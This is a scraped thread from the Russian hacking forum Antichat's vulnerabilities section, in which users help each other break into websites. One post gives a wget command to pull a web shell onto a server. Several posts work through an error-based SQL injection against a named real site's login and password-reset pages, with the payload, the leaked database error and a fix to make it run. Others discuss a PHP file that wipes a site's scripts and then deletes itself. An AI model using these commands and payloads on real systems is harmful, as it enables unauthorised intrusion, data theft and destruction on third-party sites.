HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23751  
Старый 24.08.2014, 17:12
FieryDragon
Новичок
Регистрация: 21.11.2010
Сообщений: 7
С нами: 8144246

Репутация: 0
По умолчанию

Цитата:
Сообщение от madhatter  
Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.
Таки может и поверил бы, если бы знал что да как)За совет спасибо, помогло!
 
Ответить с цитированием

  #23752  
Старый 25.08.2014, 10:35
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от vikler  
Вопрос. Сайт с post-инъекцией
Код:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj&Password=gggggggggggg%27
Вроде как стандартная error based. Но при попытке получения любой информации поучаю редирект на сообщения о неверности un/pw:
Код:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj'&Password=gggggggggggg+OR+1=@@version--
Как обойти/раскрутить?
Смотрите в эту cторону:

Цитата:
Сообщение от None  
POST /forgotpasswordsubmit.asp
username
=
'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Pages','Ima gePresets','Project','ImageUploadServers', 'NetherlandPubPhotos','dtproperties','Images'))--
 
Ответить с цитированием

  #23753  
Старый 25.08.2014, 16:47
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
Смотрите в эту cторону:
Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Incorrect syntax near the keyword 'or'.
 
Ответить с цитированием

  #23754  
Старый 25.08.2014, 17:20
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от vikler  
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Incorrect syntax near the keyword 'or'.
Все прекрасно выводит:

Цитата:
Сообщение от None  
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Conversion failed when converting the nvarchar value '
ImagesBackUp
' to data type
upd

Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
 
Ответить с цитированием

  #23755  
Старый 25.08.2014, 17:35
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
спасибо. Действительно, я и не подумала. Теперь всё отлично
 
Ответить с цитированием

  #23756  
Старый 26.08.2014, 22:48
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

ребят , на сайте пентестер нашел один файл *.php

содержимое такое:



Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))

насколько это верно? движок сайта - WP.
 
Ответить с цитированием

  #23757  
Старый 26.08.2014, 22:52
bumer
Новичок
Регистрация: 04.11.2011
Сообщений: 15
С нами: 7643126

Репутация: 0
По умолчанию

Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
 
Ответить с цитированием

  #23758  
Старый 26.08.2014, 22:56
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от bumer  
Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
Раздел "Статьи" и пошел штудировать
 
Ответить с цитированием

  #23759  
Старый 26.08.2014, 23:04
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от B1t.exe  
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:

Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.
Все верно, все файлы *.php в текущем каталоге будут удалены.

Причем этот файл сам себя удалит, тем самым типа "заметет следы"
 
Ответить с цитированием

  #23760  
Старый 26.08.2014, 23:22
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

Цитата:
Сообщение от UXOR  
Все верно, все файлы *.php в текущем каталоге будут удалены.
Причем этот файл сам себя удалит, тем самым типа "заметет следы"
Спасибо.

а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?

просто смысл удаления всех файлов.. хочу понять мотив.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.